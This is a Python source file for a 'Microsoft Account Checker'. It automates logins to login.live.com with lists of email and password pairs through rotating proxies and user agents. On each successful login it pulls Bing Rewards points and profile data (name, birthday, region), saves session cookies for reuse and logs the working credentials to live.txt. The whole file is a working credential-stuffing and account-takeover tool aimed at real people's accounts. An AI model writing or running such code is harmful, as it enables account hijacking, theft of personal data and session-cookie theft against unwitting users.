"""
Microsoft Account Checker API
Hanya khusus untuk check account functionality
"""
import requests
import re
import os
import time
import json
import random
import urllib.parse
from datetime import datetime

# ═══════════════════════════════════════════════════════════════════
#                          CONFIGURATION
# ═══════════════════════════════════════════════════════════════════

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
]

# Get root directory (public_html or public_htmls for cPanel)
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PARENT_DIR = os.path.dirname(SCRIPT_DIR)  # php/ directory

# Find public_html or public_htmls directory (for cPanel compatibility)
ROOT_DIR = None
parts = SCRIPT_DIR.split(os.sep)

# Check for public_html or public_htmls in path
for folder_name in ['public_htmls', 'public_html']:
    if folder_name in parts:
        idx = parts.index(folder_name)
        ROOT_DIR = os.sep.join(parts[:idx+1])
        break

# If not found, try to find by going up from current directory
if ROOT_DIR is None:
    current = SCRIPT_DIR
    max_levels = 5  # Don't go too far up
    for _ in range(max_levels):
        parent = os.path.dirname(current)
        if os.path.basename(parent) in ['public_htmls', 'public_html']:
            ROOT_DIR = parent
            break
        if parent == current:  # Reached root
            break
        current = parent

# If still not found, use parent directory (php/ -> web root)
if ROOT_DIR is None:
    ROOT_DIR = os.path.dirname(PARENT_DIR)

RESULTS_FOLDER = os.path.join(ROOT_DIR, "results")
# Only create folder if we have write permission
try:
    os.makedirs(RESULTS_FOLDER, exist_ok=True)
except (PermissionError, OSError) as e:
    # If can't create in ROOT_DIR, try creating in SCRIPT_DIR
    RESULTS_FOLDER = os.path.join(SCRIPT_DIR, "results")
    try:
        os.makedirs(RESULTS_FOLDER, exist_ok=True)
    except (PermissionError, OSError):
        # Last resort: use current directory
        RESULTS_FOLDER = os.path.join(os.getcwd(), "results")
        os.makedirs(RESULTS_FOLDER, exist_ok=True)

# ═══════════════════════════════════════════════════════════════════
#                          HELPER FUNCTIONS
# ═══════════════════════════════════════════════════════════════════

def build_proxy_url(config):
    """Build proxy URL from config"""
    proxy_type = config.get("proxy_type", "http").lower()
    proxy_host = config.get("proxy_host", "127.0.0.1:8080")
    proxy_username = config.get("proxy_username", "")
    proxy_password = config.get("proxy_password", "")
    
    if "://" in proxy_host:
        proxy_host = proxy_host.split("://")[1]
    
    if proxy_username and proxy_password:
        proxy_username_encoded = urllib.parse.quote(proxy_username)
        proxy_password_encoded = urllib.parse.quote(proxy_password)
        proxy_url = f"{proxy_type}://{proxy_username_encoded}:{proxy_password_encoded}@{proxy_host}"
    else:
        proxy_url = f"{proxy_type}://{proxy_host}"
    
    return proxy_url

def get_random_ua():
    """Get random user agent"""
    return random.choice(USER_AGENTS)

def get_headers(referer=None):
    """Get HTTP headers"""
    headers = {
        "User-Agent": get_random_ua(),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
    }
    if referer:
        headers["Referer"] = referer
        headers["Sec-Fetch-Site"] = "same-origin"
    return headers

def save_cookies(session, email, results_folder=None):
    """Save cookies to file in result/cookies/microsoft/random_username_email.json format"""
    # Get base folder - use results_folder if provided, otherwise use RESULTS_FOLDER
    base_folder = results_folder if results_folder else RESULTS_FOLDER
    
    # Extract username from email (part before @)
    email_parts = email.split('@')
    username_part = email_parts[0] if email_parts else 'user'
    
    # Generate random string for uniqueness
    random_str = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=8))
    
    # Create filename: random_username_email.json
    filename = f"{random_str}_{username_part}_{email.replace('@', '_at_')}.json"
    
    # Create cookies directory path
    cookies_dir = os.path.join(base_folder, "cookies", "microsoft")
    os.makedirs(cookies_dir, exist_ok=True)
    
    # Full path to cookies file
    cookies_file = os.path.join(cookies_dir, filename)
    
    # Convert cookies to dict format
    cookies_dict = [
        {
            "domain": cookie.domain,
            "hostOnly": cookie._rest.get("hostOnly", False),
            "httpOnly": cookie._rest.get("httpOnly", False),
            "name": cookie.name,
            "path": cookie.path,
            "sameSite": cookie._rest.get("sameSite", "no_restriction"),
            "secure": cookie.secure,
            "session": cookie._rest.get("session", False),
            "storeId": None,
            "value": cookie.value,
            "expirationDate": cookie.expires if cookie.expires else None
        } for cookie in session.cookies
    ]
    
    # Save cookies to file
    with open(cookies_file, 'w', encoding='utf-8') as file:
        json.dump(cookies_dict, file, indent=4, ensure_ascii=False)
    
    return cookies_file

def save_live_account(email, password, points, name, birthday, region, check_id=None, ip="Unknown", results_folder=None):
    """Save live account to file"""
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    if check_id and results_folder:
        check_folder = os.path.join(results_folder, check_id)
        os.makedirs(check_folder, exist_ok=True)
        filepath = os.path.join(check_folder, 'live.txt')
    else:
        filepath = "live.txt"
    with open(filepath, "a", encoding="utf-8") as f:
        f.write(f"{email}|{password}|{points}|{name}|{birthday}|{region}|{ip}|{timestamp}\n")

def save_dead_account(email, password, reason, check_id=None, ip="Unknown", results_folder=None):
    """Save dead account to file"""
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    if check_id and results_folder:
        check_folder = os.path.join(results_folder, check_id)
        os.makedirs(check_folder, exist_ok=True)
        filepath = os.path.join(check_folder, 'dead.txt')
    else:
        filepath = "dead.txt"
    with open(filepath, "a", encoding="utf-8") as f:
        f.write(f"[{timestamp}] {email}|{password}|{ip} → {reason}\n")

def save_error_log(email, password, error, check_id=None, ip="Unknown", results_folder=None):
    """Save error log to file"""
    timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    if check_id and results_folder:
        check_folder = os.path.join(results_folder, check_id)
        os.makedirs(check_folder, exist_ok=True)
        filepath = os.path.join(check_folder, 'error.txt')
    else:
        filepath = "error.txt"
    with open(filepath, "a", encoding="utf-8") as f:
        f.write(f"[{timestamp}] {email}|{password}|{ip} → {error}\n")

# ═══════════════════════════════════════════════════════════════════
#                          ACCOUNT CHECKER
# ═══════════════════════════════════════════════════════════════════

def check_account(email, password, use_proxy=False, proxy=None, 
                  callback_success=None, callback_error=None, callback_progress=None,
                  check_id=None, results_folder=None):
    """
    Check Microsoft account
    
    Args:
        email: Email address
        password: Password
        use_proxy: Use proxy or not
        proxy: Proxy URL
        callback_success: Callback function for success (email, password, points, name, birthday, region, ip)
        callback_error: Callback function for error (email, password, error_message, ip, is_dead)
        callback_progress: Callback function for progress (email, ip)
        check_id: Check ID for web mode
        results_folder: Results folder path
    
    Returns:
        dict: Result with status, message, and data
    """
    session = requests.Session()
    session.headers.update(get_headers())
    
    if use_proxy and proxy:
        session.proxies = {"http": proxy, "https": proxy}

    try:
        # Get public IP
        if use_proxy and proxy:
            try:
                test_response = session.get("https://api.ipify.org", timeout=10)
                if test_response.status_code == 200:
                    ip_response = test_response.text
                else:
                    session.proxies = {}
                    ip_response = session.get("https://api.ipify.org", timeout=10).text
            except Exception:
                session.proxies = {}
                ip_response = session.get("https://api.ipify.org", timeout=10).text
        else:
            ip_response = session.get("https://api.ipify.org", timeout=10).text
            
        public_ip = ''.join(c for c in ip_response if c.isprintable()).strip()
    except:
        public_ip = "Unknown"
    
    # Call progress callback
    if callback_progress:
        callback_progress(email, public_ip)

    try:
        url = f"https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=170&ct={int(time.time())}&rver=7.0.6738.0&wp=MBI_SSL&wreply=https%3A%2F%2Faccount.microsoft.com%2Fauth%2Fcomplete-signin%3Fru%3Dhttps%253A%252F%252Faccount.microsoft.com%252F&lc=1033&id=292666&lw=1&fl=easi2&login_hint={email}"
        
        response = session.get(url, headers=get_headers(), timeout=30)
        
        if "Credentials" not in response.text and "passwd" not in response.text.lower():
            if "login" not in response.text.lower() and "sign in" not in response.text.lower():
                error_msg = "Email Not Registered"
                if callback_error:
                    callback_error(email, password, error_msg, public_ip, False)
                save_error_log(email, password, error_msg, check_id, public_ip, results_folder)
                return {'status': 'failed', 'message': error_msg, 'ip': public_ip}
        
        url_patterns = [r'"urlPost":"([^"]+)"', r'"urlPostMsa":"([^"]+)"']
        url_post_msa = None
        for pattern in url_patterns:
            match = re.search(pattern, response.text)
            if match:
                url_post_msa = match.group(1).replace("\\u0026", "&").replace("\\/", "/").replace("&amp;", "&")
                break
        
        ppft_patterns = [r'value=\\"([^"\\]+)\\"', r'name="PPFT"[^>]*value="([^"]+)"', r'<input[^>]*id="i0327"[^>]*value="([^"]+)"']
        ppft_value = None
        for pattern in ppft_patterns:
            ppft_match = re.search(pattern, response.text)
            if ppft_match:
                ppft_value = ppft_match.group(1)
                break

        if url_post_msa and ppft_value:
            post_data = {
                'ps': '2', 'psRNGCDefaultType': '1', 'psRNGCEntropy': '', 'psRNGCSLK': '',
                'canary': '', 'ctx': '', 'hpgrequestid': '', 'PPFT': ppft_value, 'PPSX': 'P',
                'NewUser': '1', 'FoundMSAs': '', 'fspost': '0', 'i21': '0', 'CookieDisclosure': '0',
                'IsFidoSupported': '1', 'isSignupPost': '0', 'isRecoveryAttemptPost': '0', 'i13': '0',
                'login': email, 'loginfmt': email, 'type': '11', 'LoginOptions': '3',
                'lrt': '', 'lrtPartition': '', 'hisRegion': '', 'hisScaleUnit': '', 'passwd': password
            }

            post_headers = get_headers("https://login.live.com/")
            post_headers['Content-Type'] = 'application/x-www-form-urlencoded'
            post_headers['Origin'] = 'https://login.live.com'

            post_response = session.post(url_post_msa, headers=post_headers, data=post_data, timeout=30)

            success_indicators = ["sSigninName", "urlPostSso", '"fSuccessfullyLogon":true', "kmsiPropertiesUrl", "arrSessions", '"iLoginMode":4']
            login_success = any(indicator in post_response.text for indicator in success_indicators)
            
            if login_success:
                # Get cookies and rewards
                session.get("https://outlook.live.com/mail/0/inbox/", headers=get_headers("https://login.live.com/"), timeout=30)
                
                reward_response = session.get("https://rewards.bing.com/Signin?idru=%2F", headers=get_headers(), timeout=30)
                client_info = re.search(r'<input type="hidden" name="client_info" id="client_info" value="([^"]+)"', reward_response.text)
                code = re.search(r'<input type="hidden" name="code" id="code" value="([^"]+)"', reward_response.text)
                state = re.search(r'<input type="hidden" name="state" id="state" value="([^"]+)"', reward_response.text)

                available_points = 0
                if client_info and code and state:
                    form_data = {'client_info': client_info.group(1), 'code': code.group(1), 'state': state.group(1)}
                    final_headers = get_headers("https://rewards.bing.com/")
                    final_headers['Content-Type'] = 'application/x-www-form-urlencoded'
                    final_response = session.post("https://rewards.bing.com/signin-oidc", data=form_data, headers=final_headers, timeout=30)
                    points_match = re.search(r'availablePoints":(\d+)', final_response.text)
                    available_points = int(points_match.group(1)) if points_match else 0

                # Get profile info
                profile_response = session.get("https://account.microsoft.com/profile?lang=en-US&refd=account.live.com", headers=get_headers("https://account.microsoft.com/"), timeout=30)
                
                pprid = re.search(r'<input type="hidden" name="pprid" id="pprid" value="([^"]+)"', profile_response.text)
                nap = re.search(r'<input type="hidden" name="NAP" id="NAP" value="([^"]+)"', profile_response.text)
                anon = re.search(r'<input type="hidden" name="ANON" id="ANON" value="([^"]+)"', profile_response.text)
                t = re.search(r'<input type="hidden" name="t" id="t" value="([^"]+)"', profile_response.text)

                full_name = "N/A"
                birthday = "N/A"
                region = "N/A"

                if pprid and nap and anon and t:
                    profile_post_data = {'pprid': pprid.group(1), 'NAP': nap.group(1), 'ANON': anon.group(1), 't': t.group(1)}
                    profile_post_headers = get_headers("https://account.microsoft.com/")
                    profile_post_headers['Content-Type'] = 'application/x-www-form-urlencoded'
                    
                    final_profile = session.post("https://account.microsoft.com/auth/complete-silent-signin?ru=https%3A%2F%2Faccount.microsoft.com%2Fprofile%3Flang%3Den-US%26refd%3Daccount.live.com&wa=wsignin1.0", 
                                                  data=profile_post_data, headers=profile_post_headers, timeout=30)

                    redirect_match = re.search(r'<meta http-equiv="refresh" content="\d+;([^"]+)"', final_profile.text)
                    if redirect_match:
                        redirect_response = session.get(redirect_match.group(1), headers=get_headers("https://account.microsoft.com/"), timeout=30)
                        
                        form_action = re.search(r'<form name="fmHF" id="fmHF" action="([^"]+)" method="post"', redirect_response.text)
                        pprid2 = re.search(r'<input type="hidden" name="pprid" id="pprid" value="([^"]+)"', redirect_response.text)
                        nap2 = re.search(r'<input type="hidden" name="NAP" id="NAP" value="([^"]+)"', redirect_response.text)
                        anon2 = re.search(r'<input type="hidden" name="ANON" id="ANON" value="([^"]+)"', redirect_response.text)
                        t2 = re.search(r'<input type="hidden" name="t" id="t" value="([^"]+)"', redirect_response.text)

                        if form_action and pprid2 and nap2 and anon2 and t2:
                            final_post = {'pprid': pprid2.group(1), 'NAP': nap2.group(1), 'ANON': anon2.group(1), 't': t2.group(1)}
                            form_headers = get_headers("https://account.microsoft.com/")
                            form_headers['Content-Type'] = 'application/x-www-form-urlencoded'
                            form_response = session.post(form_action.group(1), data=final_post, headers=form_headers, timeout=30)

                            token_match = re.search(r'<input name="__RequestVerificationToken" type="hidden" value="([^"]+)"', form_response.text)
                            if token_match:
                                api_headers = get_headers("https://account.microsoft.com/profile?lang=en-US&refd=account.live.com")
                                api_headers.update({
                                    'Accept': 'application/json, text/plain, */*',
                                    'Sec-Fetch-Dest': 'empty',
                                    'Sec-Fetch-Mode': 'cors',
                                    'X-Requested-With': 'XMLHttpRequest',
                                    '__RequestVerificationToken': token_match.group(1)
                                })

                                api_response = session.get("https://account.microsoft.com/profile/api/v1/personal-info", headers=api_headers, timeout=30)
                                save_cookies(session, email, results_folder)

                                try:
                                    profile_data = api_response.json()
                                    full_name = profile_data.get("fullName", "N/A")
                                    birthday = profile_data.get("birthday", "N/A")
                                    region = profile_data.get("region", "N/A")
                                except:
                                    pass

                # Call success callback
                if callback_success:
                    callback_success(email, password, available_points, full_name, birthday, region, public_ip)
                
                save_live_account(email, password, available_points, full_name, birthday, region, check_id, public_ip, results_folder)
                return {
                    'status': 'success',
                    'points': available_points,
                    'name': full_name,
                    'birthday': birthday,
                    'region': region,
                    'ip': public_ip
                }

            else:
                # Handle login errors
                error_patterns = [r'"sErrTxt":"([^"]+)"', r"sErrTxt:'([^']+)'", r'"sErrorCode":"([^"]+)"']
                error_message = None
                for pattern in error_patterns:
                    error_match = re.search(pattern, post_response.text)
                    if error_match:
                        error_message = error_match.group(1)
                        break
                
                if error_message is None:
                    if '"IfExistsResult":0' in post_response.text:
                        error_message = "Account Not Exist"
                    elif '"IfExistsResult":1' in post_response.text:
                        error_message = "Wrong Password"
                    elif "AADSTS" in post_response.text:
                        aad_match = re.search(r'AADSTS\d+', post_response.text)
                        error_message = aad_match.group(0) if aad_match else "AAD Error"
                    elif "recover" in post_response.text.lower() or "verify" in post_response.text.lower():
                        error_message = "Recovery Required"
                    elif "proof" in post_response.text.lower():
                        error_message = "2FA Required"
                    else:
                        error_message = "Login Failed"
                
                error_message = error_message.replace("\\'", "'").replace('\\"', '"').replace("\\u0027", "'")
                error_message = error_message.split('.')[0] if '.' in error_message else error_message
                
                # Check if it's a dead account (wrong password)
                error_lower = error_message.lower()
                is_dead = error_lower in ["wrong password", "your account or password is incorrect"] or \
                          (error_lower == "ifexistsresult" and error_message == "Wrong Password") or \
                          ("incorrect" in error_lower and "password" in error_lower)
                
                if callback_error:
                    callback_error(email, password, error_message, public_ip, is_dead)
                
                if is_dead:
                    save_dead_account(email, password, error_message, check_id, public_ip, results_folder)
                else:
                    save_error_log(email, password, error_message, check_id, public_ip, results_folder)
                
                return {'status': 'failed', 'message': error_message, 'ip': public_ip, 'is_dead': is_dead}
        else:
            error_msg = "Parse Error"
            if callback_error:
                callback_error(email, password, error_msg, public_ip, False)
            save_error_log(email, password, error_msg, check_id, public_ip, results_folder)
            return {'status': 'failed', 'message': error_msg, 'ip': public_ip}
            
    except requests.exceptions.Timeout:
        error_msg = "Timeout"
        if callback_error:
            callback_error(email, password, error_msg, public_ip, False)
        save_error_log(email, password, error_msg, check_id, public_ip, results_folder)
        return {'status': 'failed', 'message': error_msg, 'ip': public_ip}
    except requests.exceptions.ProxyError:
        error_msg = "Proxy Error"
        if callback_error:
            callback_error(email, password, error_msg, public_ip, False)
        save_error_log(email, password, error_msg, check_id, public_ip, results_folder)
        return {'status': 'failed', 'message': error_msg, 'ip': public_ip}
    except Exception as e:
        error_msg = f"Error: {str(e)[:50]}"
        if callback_error:
            callback_error(email, password, error_msg, public_ip, False)
        save_error_log(email, password, str(e)[:50], check_id, public_ip, results_folder)
        return {'status': 'failed', 'message': error_msg, 'ip': public_ip}

